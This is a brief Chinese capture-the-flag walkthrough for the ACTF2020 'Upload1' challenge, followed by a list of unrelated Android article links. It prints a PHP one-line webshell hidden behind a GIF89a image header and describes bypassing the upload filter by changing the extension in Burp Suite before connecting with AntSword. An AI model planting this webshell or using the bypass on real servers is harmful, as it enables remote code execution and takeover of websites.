1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马
GIF89a? <script language="php">eval($_REQUEST[1])</script>
2、使用bp抓包修改后缀,点击发送
3、不关浏览器的代理,在bp中将该包放行
4、用蚁剑连接
5、在根目录中找到flag
[ACTF2020 新生赛]Upload1
不拿flag不改名2024-09-12 13:20
相关推荐
每次的天空36 分钟前
Android-自定义View的实战学习总结恋猫de小郭1 小时前
Flutter Widget Preview 功能已合并到 master,提前在体验毛坯的预览支持断剑重铸之日2 小时前
Android自定义相机开发(类似OCR扫描相机)随心最为安2 小时前
Android Library Maven 发布完整流程指南岁月玲珑2 小时前
【使用Android Studio调试手机app时候手机老掉线问题】还鮟6 小时前
CTF Web的数组巧用小蜜蜂嗡嗡8 小时前
Android Studio flutter项目运行、打包时间太长aqi008 小时前
FFmpeg开发笔记(七十一)使用国产的QPlayer2实现双播放器观看视频zhangphil9 小时前
Android理解onTrimMemory中ComponentCallbacks2的内存警戒水位线值你过来啊你10 小时前
Android View的绘制原理详解